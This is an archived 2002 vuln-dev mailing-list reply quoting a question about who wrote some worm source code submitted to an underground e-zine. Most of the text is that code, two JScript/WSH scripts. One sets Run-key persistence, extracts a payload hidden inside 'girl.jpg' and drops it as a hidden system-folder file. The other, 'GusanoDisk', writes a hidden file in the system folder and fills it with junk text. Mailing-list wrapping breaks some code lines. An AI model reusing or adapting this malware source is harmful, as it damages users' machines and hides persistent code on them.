RE: Stolen source?

From: Cushing, David (David.Cushingat_private)
Date: Mon Mar 18 2002 - 07:24:21 PST

  • Next message: DePriest, Jason R.: "RE: Wireless Legality- Netstumbler and kin"

    Does this help?
    > -----Original Message-----
    > From: Arturo "Buanzo" Busleiman [mailto:buanzoat_private]
    > Sent: Sunday, March 17, 2002 11:13 PM
    > To: vuln-devat_private
    > Subject: Stolen source?
    > Hi!
    > Do you recognize this source code? Can you tell which is the 
    > real/original
    > author?
    > I explain: I am a member of the Raregazz Team, we produce (!) 
    > series of
    > underground-related articles. On the 18th edition, a 
    > non-member send us an
    > article which was half-stolen from another author (not well 
    > known either
    > of them). Now, he is sending us another article, a 
    > source-code explanation
    > for a worm. This source code makes me remember of someone else's...
    > So, I would like to find:
    > a) the original author or at least
    > b) know if this source is not an original (i.e is stolen)
    > Thank you!
    >   var ob, ws, ws2, g, g2, t, yu, ly, f, f2;
    >   ob = new ActiveXObject("Scripting.FileSystemObject");
    >   ws = WScript.CreateObject ("WScript.Shell");
    >   n = ob.GetSpecialFolder(1)+"\\";
    >   yu = ran();
    >   ly = n+yu+".js";
    >   mai();
    > function mai(){
    >   ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay");
    > if (ws2 != "auto"){
    > ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersio
    > n\\Run\\"+yu, l
    > y, "REG_SZ");
    >   ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", 
    > "auto", "REG_SZ");
    >   g = ob.GetFile("girl.jpg");
    >   f = g.OpenAsTextStream(1, -2);
    >   g2 = f.ReadAll();
    >   g2 = g2.substring(31029, 32457);
    >   t = ob.OpenTextFile(ly, 2, true);
    >   t.Write(g2);
    >   t.Close();
    >   f2 = ob.GetFile(ly);
    >   f2.attributes = f2.attributes + 4;
    >   }
    > }
    > function ran(){
    >   rr = new Array(15);
    >   rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; 
    > rr[3] ="$alg"; rr[4]
    >  ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] 
    > ="$system"; rr[9]
    >  ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] 
    > ="$msn"; rr[13] ="$clock
    > "; rr[14] ="$logger"; rr[15] ="$yl";
    >   var irr = rr[parseInt(Math.round(Math.random()*15))];
    >   return (irr);
    > }
    > /* second source code */
    >   var ob, f, f2, t, t2, n, w, ry0, ry1;
    >   ob = new ActiveXObject("Scripting.FileSystemObject");
    >   t = new Date();
    >   t2 = t.getHours()+t.getMinutes()+t.getSeconds();
    >   n = ob.GetSpecialFolder(1)+"\\";
    >   wrote();
    > function wrote(){
    >   ry0 = ran();
    >   ry1 = ran2();
    >   w = n+ry0+t2+ry1;
    >   f = ob.OpenTextFile(w, 2, true);
    >   for (q = 0; q < 1000; q++){rew();}
    >   f.Close();
    >   f2 = ob.GetFile(w);
    >   f2.attributes = f2.attributes + 4;
    > }
    > function ran(){
    > rr = new Array(15);
    > rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; 
    > rr[3] ="alg."; rr[4] =
    > "logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] 
    > ="system."; rr[9]
    >  ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; 
    > rr[13] ="clock.";
    >  rr[14] ="logger."; rr[15] ="yl.";
    > var irr = rr[parseInt(Math.round(Math.random()*15))];
    > return (irr);
    > }
    > function ran2(){
    > rr2 = new Array(15);
    > rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] 
    > =".bat"; rr2[4] =".tmp";
    >  rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] 
    > =".vxd"; rr2[9] =".dll"
    > ; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] 
    > =".dat"; rr2[14] =
    > ".yl"; rr2[15] =".hex";
    > var irr2 = rr2[parseInt(Math.round(Math.random()*15))];
    > return (irr2);
    > }
    > function rew(){
    >   f.Write(":::: GusanoDisk Y v5.recover ::::");
    >   f.Write("Creado :: "+ t2);
    >   f.WriteBlankLines(90);
    >   for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. 
    > Gracias por sus
    >   megabytes.");
    > }
    > }

    This archive was generated by hypermail 2b30 : Mon Mar 18 2002 - 08:45:50 PST